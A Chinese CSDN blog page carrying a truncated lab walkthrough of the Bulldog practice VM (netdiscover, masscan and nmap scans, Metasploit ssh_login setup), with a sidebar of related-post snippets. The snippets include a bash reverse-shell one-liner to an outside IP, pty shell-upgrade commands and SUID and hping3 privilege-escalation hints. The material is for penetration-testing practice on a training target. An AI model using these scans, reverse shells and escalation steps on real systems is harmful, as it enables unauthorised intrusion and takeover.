靶机Bulldog练习:通过python脚本远程连接弹出shell进行提权

最新推荐文章于 2023-03-29 20:57:43 发布
最新推荐文章于 2023-03-29 20:57:43 发布
阅读量876 收藏 4
点赞数
分类专栏: 渗透学习 靶机练习 文章标签: bulldog靶机练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41210745/article/details/103452519
版权
本文介绍了通过主机发现、端口扫描、信息收集分析等步骤,逐步渗透Bulldog靶机的过程。重点讲述了如何利用Python脚本远程连接靶机并获取shell,以及在提权过程中遇到的问题和解决方法,最终成功获取root权限。
摘要由CSDN通过智能技术生成

1.主机发现

方法一:netdiscover命令

netdiscover -i eth0 -r 192.168.109.0/24         主动,不扫描本机IP地址

netdiscover -p                                                被动,不容易被发现,只能扫到有交互的

 -i 指定网卡 -r 指定网段

方法二:nmap命令

2.端口扫描

masscan kali下的工具(速度快,容易漏IP,一次没扫到,多扫几遍)

masscan --rate=10000 --ports 0-65535 192.168.109.151

--rate发包数(发包数默认为100个)   --ports指定端口数

nmap -T4 -sV -O -p 8080,80,23 192.168.109.151            //nmap扫出详细信息

-T4:速度    -sV:版本扫描和开启的服务  -O:操作系统

3.信息收集分析

ssh服务端口开放,尝试检索:打开msfconsole

可以联想到进行ssh爆破,搜索ssh_login

发现辅助模块扫描ssh登录和ssh公钥登录

set rhosts 192.168.109.151(目标IP地址)<

最低0.47元/天 解锁文章
7Riven
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python打开伪终端_0xB:伪终端
weixin_39603397的博客
11-30 1474
##伪终端这一章,我们来讲讲如何使用python做一个伪终端.不过在这之前你需要先了解一点伪终端的意思,还有一些技巧.这个我们会在下面讲到:伪终端其实就是命令终端(cmd.exe,/bin/sh)通过网络接口反弹给攻击者,或者是新建一个监听端口反弹一个终端给攻击者,值得注意的就是原终端对于标准的输入,输出是不做处理的(stdin/stdout/stderr),同样的反弹的shell也是不对它做处理...
sudo命令中python提权
qq_40898302的博客
05-10 4104
python提权
拿到webshell后利用python改变shell类型
qq_29566629的博客
03-27 2031
使用一条命令即可: python -c ‘import pty;pty.spawn(“/bin/bash”)’ ''' -c 后跟命令,也就是说后面引号里的内容相当于会执行的代码 pty 模块定义了一些处理“伪终端”概念的操作:启动另一个进程并能以程序方式在其控制终端中进行读写。 pty.spawn(argv[, master_read[, stdin_read]]) 生成一个进程,并将其控制终端连接到当前进程的标准 io。 这常被用来应对坚持要从控制终端读取数据的程序。 ''' 所以在靶机里存在Pyth
python3 -c ‘import pty;pty.spawn(“/bin/bash“)‘升级切换交互式shell
sweelg的博客
02-28 3724
python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty -a stty raw -echo;fg reset stty rows 29 columns 94 row和columns数据为stty -a后的数据
DC 靶机
niqiu320的博客
05-12 3919
DC-1实战 大致流程(copy博客为lainwith的) 环境kali 1、首先ifconfig 得知ip为192.168.149.xxx/ 2、局域网探测arp-scan -l 得知靶机ip为192.168.149.147 3、扫描端口nmap -sV -p- 192.168.149.147,查看端口信息,得知80端口开放,浏览器访问80端口查看 4、目录遍历dirb http://192.168.149.147,无可用信息 5.、启动Metersploit来查看漏洞并利用漏洞msfconsole 6
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 ... ... 绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4 ...使用jerry用户通过git提权,进入root目录找到final_flag
第76天:Python开发-内外网收集Socket&子域名&DNS1
08-03
5. **系统判断**:通过TTL值或者第三方脚本(如NMAP)来判断远程主机的操作系统类型。 **代码示例** 在提供的代码中,可以看到以下几个关键函数的实现: - `ip_check(url)`:获取URL对应的IP地址。 - `whois_...
python跳转回上条命令_实现交互式shell的几种方式
weixin_29029673的博客
01-30 2061
文章最后更新时间为:2019年06月12日 00:56:19当我们拿到一个webshell的时候,我们能够执行一些命令,但是这些命令都是非交互的,也就是说不存在上下文的概念。当我们想使用vim、top等命令时,webshell就无能为力了。那我们怎么获取一个可交互的webshell呢?1. python pty 方式一般我们都会使用nc来接收反弹来的shell,只需要在目标上(以linux为例)执...
python实现调用shell代码(windows系统下)
To_conquer_or_to_die的博客
09-30 3195
git bash下用./XXX.sh arg1 arg2 .... 就可以执行.shell文件 python下 我们可以使用 os.popen(Cmd) 来执行命令行,但是Cmd下似乎不能执行shell脚本,我们可以通过 bash XXX.sh来解决 案例代码如下: #!/usr/bin/python #vim: set fileencoding:utf-8 import os im...
怎么用python实现tcp通信
y632481222的博客
03-05 1722
要使用Python实现TCP通信,需要使用Python的socket模块。以下是一个简单的TCP客户端和服务器的示例: TCP服务器: ```python import socket # 创建TCP socket对象 server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 绑定IP地址和端口号 server_socket.bind(('127.0.0.1', 8888)) # 监听客户端连接 server_socke
SSH密钥提权
qq_37407863的博客
07-03 1679
当我们在渗透测试的过程中,拿到一台linux服务器shellshell的权限只是普通账号权限的时候,我们可以利用ssh密钥来切换权限相同的账号或者root账号。运维人员如果在服务器上使用ssh-keygen生成密钥对(id_rsa、id_rsa.pub),然后采用此密钥对进行远程登录,那么当他忘记把私钥(id_rsa)删除,且文件权限可读,黑客就可以使用这个私钥进行用户登录,达到用户水平越权或者权限提升到root。使用命令查看系统中存在用户 注:”authorized_keys“文件用来登录的公钥验证
反弹shell的多种方式
课嗨教育的专栏
04-03 321
升级成半交互式 tty python -c 'import pty; pty.spawn("/bin/bash")' 升级成完全交互式 tty,能用方向键 + tab,就是退出比较麻烦。 python -c 'import pty; pty.spawn("/bin/bash")' Ctrl + Z stty raw -echo fg reset Bash Tested on Ubuntu 10.10 /bin/bash -i >& /dev/tcp/10.10.14.1/44
基于python的客户端与服务器端之间的通信
DIMP_的博客
03-29 1650
执行过程:重新执行了两次`wget https://www.python.org/ftp/python/3.6.2/Python-3.6.2.tar.xz`命令,但每次解压tar包都会有这个问题,最后发现是因为第一次下载的不完整压缩包,解压后的文件夹保留,导致后续重新下载的重名文件名带(1)(2)...,系统解压依旧用第一个。原因二、tcp/ip连接方式进行数据发送、接收。在客户端接受键盘的数据,通过tcp发送到服务器,服务器显示客户端发送的数据,返回`接收到数据的时间+发送过来的数据`。
靶机 Cute
m0_66299232的博客
09-27 1274
再使用finf命令 find /-perm -4000 2>/dev/null 看下有没有惊喜。3.输入网址后 频频报错 发现这个python脚本多了一个/CuteNews 将他替换掉。4.发现一个hping3 拿来提权 usr/sbin/hping3 /bin/sh -p。5.访问网址,发现是一个cutenews的一个管理系统,并且有版本号。4.再次利用脚本得到一个可以执行命令的界面(可以说是个后台)1.反弹成功,在home目录下,发现一个fox用户。虚拟机网络链接模式:桥接模式。
【pylington靶机
qq_40646572的博客
05-26 196
信息搜集 启动靶机。 使用nmap扫描网段地址,发现靶机ip地址以及对应对外开启的端口服务。 web服务探测 使用dirsearch扫描下网站目录,发现一个关键文件robots.txt,打开发现一个无规则字符的文件。 发现一个用户以及密码。 登录成功后,发现一个连接地址。 打开连接后,发现一个在线python执行页面,并且提示,不可以使用os模块,并且有示例文件。 发现执行代码,存在import代码和os以及open函数时,将会被拦截。 line= "import os;os.sy
sqlmap进行os-shell需要靶机开启3306端口和MYSQL远程登陆吗
最新发布
07-13
如果目标靶机满足上述条件,SQLMap就可以通过与目标数据库建立连接并执行操作系统命令,从而实现OS shell攻击。 然而,值得注意的是,远程登录MySQL并执行操作系统命令是一种非常危险的行为,可能导致系统的安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值